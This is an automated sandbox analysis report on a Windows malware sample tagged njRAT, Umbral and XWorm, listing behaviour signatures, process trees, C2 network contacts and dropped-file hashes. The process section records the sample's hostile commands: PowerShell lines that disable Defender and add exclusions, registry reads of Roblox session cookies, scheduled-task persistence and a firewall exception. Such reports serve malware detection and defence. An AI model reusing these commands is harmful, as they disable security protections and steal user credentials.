Malware Analysis Report

2024-10-10 09:55

Sample ID 240711-tmzv9awgkf
Target 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe
SHA256 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed
Tags
njrat umbral xworm hacked evasion execution persistence privilege_escalation rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed

Threat Level: Known bad

The file 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe was found to be: Known bad.

Malicious Activity Summary

njrat umbral xworm hacked evasion execution persistence privilege_escalation rat spyware stealer trojan

Xworm

Umbral

njRAT/Bladabindi

Detect Umbral payload

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Reads user/profile data of web browsers

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Detects videocard installed

Scheduled Task/Job: Scheduled Task

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-11 16:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-11 16:11

Reported

2024-07-11 16:13

Platform

win7-20240704-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

njRAT/Bladabindi

trojan njrat

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\conhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\conhost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2548 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\Server.exe
PID 2548 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\Server.exe
PID 2548 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\Server.exe
PID 2548 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\3.exe
PID 2548 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\3.exe
PID 2548 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\3.exe
PID 2548 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\msxml6.EXE
PID 2548 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\msxml6.EXE
PID 2548 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\msxml6.EXE
PID 2764 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 2764 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 2764 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 2764 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 2764 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 2764 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 2856 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 2856 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 2856 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 2856 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 2856 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 2856 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 2856 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 2772 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\system32\attrib.exe
PID 2772 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\system32\attrib.exe
PID 2772 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\system32\attrib.exe
PID 2772 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 572 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 960 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 960 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 960 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 3056 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 3056 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 3056 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 3056 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 2772 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 2772 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe

"C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe"

C:\Users\Admin\AppData\Local\Temp\Server.exe

"C:\Users\Admin\AppData\Local\Temp\Server.exe"

C:\Users\Admin\AppData\Local\Temp\3.exe

"C:\Users\Admin\AppData\Local\Temp\3.exe"

C:\Users\Admin\AppData\Local\Temp\msxml6.EXE

"C:\Users\Admin\AppData\Local\Temp\msxml6.EXE"

C:\Users\Admin\AppData\Roaming\3.exe

"C:\Users\Admin\AppData\Roaming\3.exe"

C:\Users\Admin\AppData\Roaming\conhost.exe

"C:\Users\Admin\AppData\Roaming\conhost.exe"

C:\Users\Admin\AppData\Roaming\Server.exe

"C:\Users\Admin\AppData\Roaming\Server.exe"

C:\Users\Admin\AppData\Roaming\conhost.exe

"C:\Users\Admin\AppData\Roaming\conhost.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\3.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\3.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\taskeng.exe

taskeng.exe {6EC83B88-1A77-48E9-A2B9-2CA68F99B8C2} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Ondrive.exe

C:\Users\Admin\AppData\Roaming\Ondrive.exe

C:\Users\Admin\AppData\Roaming\Ondrive.exe

C:\Users\Admin\AppData\Roaming\Ondrive.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.187.195:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 testarosa.duckdns.org udp
DE 158.255.214.24:7110 testarosa.duckdns.org tcp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp

Files

memory/2548-0-0x000007FEF6533000-0x000007FEF6534000-memory.dmp

memory/2548-1-0x0000000000010000-0x00000000007D0000-memory.dmp

memory/2548-2-0x000007FEF6530000-0x000007FEF6F1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Server.exe

MD5 f9b08bd21b40a938122b479095b7c70c
SHA1 eb925e3927b83c20d8d24bdab2e587c10d6ac8cd
SHA256 c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8
SHA512 fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee

C:\Users\Admin\AppData\Local\Temp\3.exe

MD5 ed59c6590b199b2ee53eec444322472b
SHA1 6c91f4e2489a9869ab971061fdd67a0eeb1e7007
SHA256 aa4abbb1305525b1703a23521db1e817dfd39f014527c319a16a153d2d9dcb0f
SHA512 7dd903995d2c673a3778c5f4f5006cdf3e177ad9093649e5e953894e49f386049ae1e58103095874f09b91d4e21d963d05f02ea9644ed67dd3054aa10b47ba97

memory/2856-11-0x0000000000960000-0x0000000000978000-memory.dmp

memory/2764-14-0x00000000003A0000-0x00000000003EA000-memory.dmp

memory/2856-18-0x000007FEF6530000-0x000007FEF6F1C000-memory.dmp

C:\Users\Admin\AppData\Roaming\conhost.exe

MD5 b37dd1a1f0507baf993471ae1b7a314c
SHA1 9aff9d71492ffff8d51f8e8d67f5770755899882
SHA256 e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc
SHA512 ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460

\Users\Admin\AppData\Local\Temp\msxml6.EXE

MD5 8b39a0c9d351c316ae38251db3e917da
SHA1 71c988393af62584e93ebe721a600c1a51fa7c29
SHA256 aacbefe172556a5df9e5bf52834aaa22893002edeb46533e1a85866cc7462a15
SHA512 092f06c5f373a65be4f4784357596422df1bb50dcd81c0056464c70f99a0845d71e6819f01c8e7a2ca3f663ad4125588b6e48d88ec0736e7305a70bd8c59e9af

memory/2772-29-0x0000000001270000-0x00000000012B0000-memory.dmp

memory/2548-35-0x000007FEF6530000-0x000007FEF6F1C000-memory.dmp

C:\Users\Admin\AppData\Roaming\3.exe

MD5 66d7e8125484efe9585adf807f3860ec
SHA1 aad54a84cc6bfcd422631bfce7b187b001ec0128
SHA256 9cc7b63b2a2c95cfdd1f0f9044f6f760d8dae0d622aa07cb18ce071d9c491d4e
SHA512 f0eabf14bab037689568dc6f7bb6126d1c5922e08432b650e338567c7ae2d70d1ac3420dfec0501453a0e8fece11482071434137e70d62e1136dd482a791d5d5

C:\Users\Admin\AppData\Roaming\Server.exe

MD5 32fe01ccb93b0233503d0aaaa451f7b2
SHA1 58e5a63142150e8fb175dbb4dedea2ce405d7db0
SHA256 6988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43
SHA512 76945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6

memory/2744-40-0x0000000000180000-0x0000000000190000-memory.dmp

memory/2856-42-0x000007FEF6530000-0x000007FEF6F1C000-memory.dmp

memory/1428-47-0x000000001B240000-0x000000001B522000-memory.dmp

memory/1428-48-0x00000000023F0000-0x00000000023F8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 4b44d6a9b4157f7e5c708027e8cf5f03
SHA1 90a97073b014839b7301ffed9354cdba378d0bec
SHA256 f97f709534e5ddee9e2d277041059685f562fa1da7b4ef82711aa8d5d2ce3ec3
SHA512 20f972d6126e7ae251926404e871a73ef71e4eeed6c6ca2d8b431a61e1b0fb502a0f7d9ff8666c0bacea8cda97bd2494038b069a790fc4ad72051be7b21425c2

memory/2924-54-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

memory/2924-55-0x0000000002020000-0x0000000002028000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
